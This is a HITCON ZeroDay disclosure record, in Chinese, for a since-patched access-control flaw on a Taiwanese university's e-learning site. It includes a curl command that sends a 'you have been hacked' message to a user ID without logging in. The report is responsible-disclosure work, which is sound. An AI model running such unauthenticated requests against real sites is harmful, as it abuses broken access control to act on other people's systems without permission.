國立高雄應用科技大學網站漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00349
  • Vendor: 國立高雄應用科技大學
  • Title: 國立高雄應用科技大學網站漏洞
  • Introduction: 免登入繞過權限發送訊息

處理狀態

目前狀態

公開
Last Update : 2016/12/25
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2016/12/17 13:30:52 : 新提交 (由 xiplus 更新此狀態)
  • 2016/12/17 13:31:00 : 新提交 (由 xiplus 更新此狀態)
  • 2016/12/17 15:57:02 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/12/19 10:26:56 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/12/19 10:26:57 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/12/20 16:16:28 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/12/21 13:10:10 : 確認已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/12/25 03:00:02 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2016-00349
  • 通報者:xiplus (xiplus)
  • 風險:中
  • 類型:權限提升 (Privilege Escalation)

參考資料

攻擊者可利用此漏洞提升帳號權限,如其他使用者甚至管理者權限。

漏洞說明: OWASP - Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control

漏洞說明: OWASP - Testing for Privilege escalation (OTG-AUTHZ-003)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

漏洞說明: CWE - Privilege
https://cwe.mitre.org/data/definitions/901.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://ilearning.kuas.edu.tw/message/write.php

敘述

圖1為已登入使用者可以發送訊息
圖2為未登入使用者無法發送訊息
但使用指令
curl -H "User-Agent:haha" -d "to=1105108138&subject=you have been hacked&content=I am guest" http://ilearning.kuas.edu.tw/message/writing.php
在未登入情況下仍可發送訊息(寄件者為guest)

擷圖

留言討論

;